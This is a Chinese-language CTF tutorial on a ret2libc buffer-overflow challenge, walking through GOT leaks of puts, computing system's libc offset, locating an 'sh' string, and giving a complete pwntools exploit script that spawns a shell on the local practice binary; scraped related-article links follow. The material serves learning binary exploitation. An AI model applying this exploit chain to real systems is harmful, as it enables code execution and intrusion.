背景知识

fflush 函数,清理缓冲区。

fflush(stdout) 一次性输出以上缓冲区所有数据

read(0,&buf,0xAu) 0代表标准输入,标准输出1,标准错误2,&buf 向buf输入。输入 长度为A的值的长度,数据类型U代表的是无符int

strtol(&buf,v3,v4) 是将输入的数据的ASCII码转换成数值存入 buf 中去

read 中接受的是ascii码,所以使用python方法应该是 io.send(str('某个地址'))

使用got 查看运行的GOt 表中的信息

其中0x80 开始的就是未加载的表象地址。而0xf 开始一般都是libc中的地址



由上图可以看出,在 plt 中无 system 函数

利用查找字符串也未发现 /bin/sh

构建shell思路

当调试的时候查询到 puts 函数的时候,因为在 libc 中是固定的, 所以system 相对于puts 的位置是固定的,得到了puts 的地址加上偏移量即可获得system 地址

libc=ELF('./libc-2.23.so')

libc.symbols["system"] //获取方法和获取当前变量一样

libc.symbols["puts"]

同样也可以使用ida进行获取



puts



相差的绝对值为 system - puts =

获取 puts 的 Got 地址。

from pwn import *

io=process('./ret2libc3')

elf=ELF('./ret2libc3')

elf.got['puts']



获得elf中put的 puts 地址 134520860

将该值传到服务器(这里是本地进程)

See_something 函数获取put在远程(这里是本地测试)的地址。



地址为0xf7daecd0 以 f7 开头的一般都是 libc 地址

获取sh 地址

获取到fflush 存储的地址,读取由sh开始的地址,当读取完sh 就会读取到 %00 。

即可完成字符串sh 的读取

netx(elf.search(b"sh\0x00"))

利用链

在复制过程中 src 的内容过长(0x100),导致 dest 之外的内容被覆盖。

src 内容来自于用户输入。

(注:默认情况下使用的libc文件为本机文件,使用ldd ret2libc3 -v查看相关信息)

payload

from pwn import *

io=process("./ret2libc3")

elf=ELF("./ret2libc3.1")

libc3=ELF("/lib/i386-linux-gnu/libc.so.6")

io.sendlineafter(" :",str(elf.got["puts"]))

io.recvuntil(b' : ')

puts_addr=int(io.recvuntil(b'\n',drop=True),16)

base_addr=libc3.symbols["system"]-libc3.symbols["puts"]

print(base_addr)

payload=flat(cyclic(60),puts_addr+base_addr,0xdeadbeef,next(elf.search(b"sh\x00")))

print(payload)

io.sendlineafter(b" :",payload)

print(io.recv())

io.interactive()

ret2libc--ROP(pwn)漏洞入门分析的更多相关文章

  1. [web安全原理分析]-SSRF漏洞入门

    SSRF漏洞 SSRF漏洞 SSRF意为服务端请求伪造(Server-Side Request Forge).攻击者利用SSRF漏洞通过服务器发起伪造请求,就这样可以访问内网的数据,进行内网信息探测或 ...

  2. Linux下pwn从入门到放弃

    Linux下pwn从入门到放弃 0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell. 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行 ...

  3. Ripple 20:Treck TCP/IP协议漏洞技术分析

    本文由“合天智汇”公众号首发,作者:b1ngo Ripple 20:Treck TCP/IP协议漏洞技术分析 Ripple20是一系列影响数亿台设备的0day(19个),是JSOF研究实验室在Trec ...

  4. iot漏洞入门

    路由器漏洞入门 下载项目https://github.com/praetorian-inc/DVRF 安装quem sudo apt install qemu-user-static 安装gdb-mu ...

  5. [web安全]Web应用漏洞攻击分析与防范

    网站攻击主要分为以下几类: (1) sql注入攻击 SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.它是利 ...

  6. Google发布SSLv3漏洞简要分析报告

    今天上午,Google发布了一份关于SSLv3漏洞的简要分析报告.根据Google的说法,该漏洞贯穿于所有的SSLv3版本中,利用该漏洞,黑客可以通过中间人攻击等类似的方式(只要劫持到的数据加密两端均 ...

  7. 关于 target="_blank"漏洞的分析

    创建: 于 八月 30, 2016 关于 target="_blank"漏洞的分析  一.漏洞详情:首先攻击者能够将链接(指向攻击者自己控制的页面的,该被控页面的js脚本可以对母页 ...

  8. 美链BEC合约漏洞技术分析

    这两天币圈链圈被美链BEC智能合约的漏洞导致代币价值几乎归零的事件刷遍朋友圈.这篇文章就来分析下BEC智能合约的漏洞 漏洞攻击交易 我们先来还原下攻击交易,这个交易可以在这个链接查询到. 我截图给大家 ...

  9. Heartbleed心脏出血漏洞原理分析

    Heartbleed心脏出血漏洞原理分析 2017年01月14日 18:14:25 阅读数:2718 1. 概述    OpenSSL在实现TLS和DTLS的心跳处理逻辑时,存在编码缺陷.OpenSS ...

随机推荐

  1. java执行器

    Executor 执行已提交的 Runnable 任务对象.此接口提供一种将任务提交与每个任务将如何运行的机制(包括线程使用的细节.调度等)分离开来的方法.Executor 接口并没有严格地要求执行是 ...

  2. nacos快速安装

    一 什么是 Nacos 服务注册中心和配置中心. 二 使用 下载和启动 使用有两种方式 1.自己下载源码编译 2.下载编译好的压缩包 我比较懒选择了第二种方式. 最新稳定版本 下载地址:https:/ ...

  3. 你没有看错,爬网页数据,C# 也可以像 Jquery 那样

    一:背景 1. 讲故事 前段时间搞了一个地方性民生资讯号,资讯嘛,都是我抄你的,你抄官媒的,小市民都喜欢奇闻异事,所以就存在一个需求,如何去定向抓取奇闻异事的地方号上的新闻,其实做起来很简单,用逻辑回 ...

  4. 【转】Locust-工具核心原理分析

    Locust工具在市场上不如Loadrunner / JMeter流行,使用的范围也没有那么广,但不可否认其是一款很不错的工具.我个人觉得Locust使用不是那么广泛,主要是因为一下方式: Locus ...

  5. 几个超级好用但很少有人知道的 webstorm技巧

    我总结一些我发现的比较实用的功能,内容来自日常工作中用到的功能.图片来自PPT,是在公司内部的分享. 你不知道的webstorm进阶使用技巧 1.双击shift 全局搜索,可以搜索代码.设置等. 如果 ...

  6. 解决pycharm py文件运行后停止按钮变成了灰色的问题

  7. 基于vue2定义自己的图表echart组件

    先安装echarts cnpm i echarts -S,然后定义父组件 <template> <div> <echarts :option="echartOp ...

  8. SpringBoot-04-自动配置原理再理解

    4. 自动配置原理再理解 ​ 配置文件到底能写什么?怎么写?SpringBoot官方文档有大量的配置,但是难以全部记住. 分析自动配置原理 ​ 官方文档 ​ 我们以HttpEncodingAutoCo ...

  9. 《VC++ 深入详解》 第3版 这是盗版书么~。。。

    <VC++ 深入详解> 第3版 www.broadview.com.cn 书读到一小半,发现书重复了一部分,缺失一部分.... 难受~ 比较难继续下去了 有一样的小伙伴么~ <VC+ ...

  10. linux下的echo

    echo命令用于在shell中打印shell变量的值,或者直接输出指定的字符串.linux的echo命令,在shell编程中极为常用, 在终端下打印变量value的时候也是常常用到的,因此有必要了解下 ...